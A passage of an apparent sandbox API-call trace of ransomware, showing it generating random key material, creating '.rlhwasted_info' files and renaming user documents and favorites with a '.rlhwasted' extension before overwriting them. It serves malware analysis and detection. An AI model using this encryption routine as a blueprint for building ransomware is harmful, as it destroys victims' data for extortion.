dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0192.561] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0192.561] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.562] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0192.562] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0192.563] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.643] SetEndOfFile (hFile=0x104) returned 1 [0192.646] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.646] CloseHandle (hObject=0x104) returned 1 [0192.648] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0192.649] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0192.650] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0192.650] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.650] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yjB0xvXQbozd.odp") returned 60 [0192.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0192.650] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.650] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0192.651] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.651] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yjB0xvXQbozd.odp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yjb0xvxqbozd.odp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0192.699] WriteFile (in: hFile=0x104, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0192.700] SetEndOfFile (hFile=0x104) returned 1 [0192.700] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.701] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.701] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yjB0xvXQbozd.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yjb0xvxqbozd.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yjB0xvXQbozd.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yjb0xvxqbozd.odp.rlhwasted")) returned 1 [0192.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yjB0xvXQbozd.odp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yjb0xvxqbozd.odp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0192.703] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0192.761] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0192.762] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0192.762] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.762] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0192.763] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0192.763] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.801] SetEndOfFile (hFile=0x104) returned 1 [0192.803] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.803] CloseHandle (hObject=0x104) returned 1 [0192.814] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0192.815] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0192.816] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0192.816] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0192.816] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x294) returned 0x6d4580 [0192.816] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0192.817] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0192.817] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0192.818] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0192.818] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0192.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0192.997] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0192.998] SetEndOfFile (hFile=0x128) returned 1 [0192.999] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.999] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0192.999] lstrcpyW (in: lpString1=0x6d460a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0192.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.rlhwasted")) returned 1 [0193.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0193.046] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0193.046] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0193.047] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0193.047] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.047] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0193.048] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0193.048] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.057] SetEndOfFile (hFile=0x128) returned 1 [0193.059] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.059] CloseHandle (hObject=0x128) returned 1 [0193.094] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0193.094] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0193.095] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0193.095] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.095] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0193.095] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x70cfe8 [0193.095] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0193.096] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6fd458 [0193.096] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0193.097] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6fd458 | out: pbBuffer=0x6fd458) returned 1 [0193.097] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0193.098] WriteFile (in: hFile=0x128, lpBuffer=0x6fd458*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6fd458*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0193.100] SetEndOfFile (hFile=0x128) returned 1 [0193.100] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.100] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd458 | out: hHeap=0x6b0000) returned 1 [0193.100] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.100] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.rlhwasted")) returned 1 [0193.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0193.124] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0193.125] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0193.126] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0193.126] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.126] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0193.127] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0193.127] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.141] SetEndOfFile (hFile=0x128) returned 1 [0193.144] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.144] CloseHandle (hObject=0x128) returned 1 [0193.148] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0193.148] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0193.150] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0193.150] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0193.150] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x296) returned 0x6d4580 [0193.150] lstrcpyW (in: lpString1=0x6d460c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0193.150] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0193.150] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0193.151] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0193.151] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0193.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0193.153] WriteFile (in: hFile=0x128, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0193.188] SetEndOfFile (hFile=0x128) returned 1 [0193.189] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.189] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.190] lstrcpyW (in: lpString1=0x6d460c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.rlhwasted")) returned 1 [0193.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0193.204] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0193.206] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0193.208] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0193.208] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.208] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0193.209] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0193.209] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.222] SetEndOfFile (hFile=0x128) returned 1 [0193.225] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.225] CloseHandle (hObject=0x128) returned 1 [0193.821] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0193.821] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0193.972] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0193.972] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.972] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0193.972] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6d4580 [0193.972] lstrcpyW (in: lpString1=0x6d460e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0193.973] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0193.973] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0193.973] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0193.974] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0193.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0193.974] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0193.975] SetEndOfFile (hFile=0x124) returned 1 [0193.975] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.976] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0193.983] lstrcpyW (in: lpString1=0x6d460e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0193.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.rlhwasted")) returned 1 [0194.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0194.075] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0194.076] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.077] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.077] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.077] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.078] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.078] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.087] SetEndOfFile (hFile=0x124) returned 1 [0194.090] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.090] CloseHandle (hObject=0x124) returned 1 [0194.092] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.092] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.093] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.093] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0194.094] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a4) returned 0x6d4580 [0194.094] lstrcpyW (in: lpString1=0x6d461a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.094] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.094] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.095] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.095] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.096] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.097] SetEndOfFile (hFile=0x124) returned 1 [0194.097] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.098] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.098] lstrcpyW (in: lpString1=0x6d461a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows 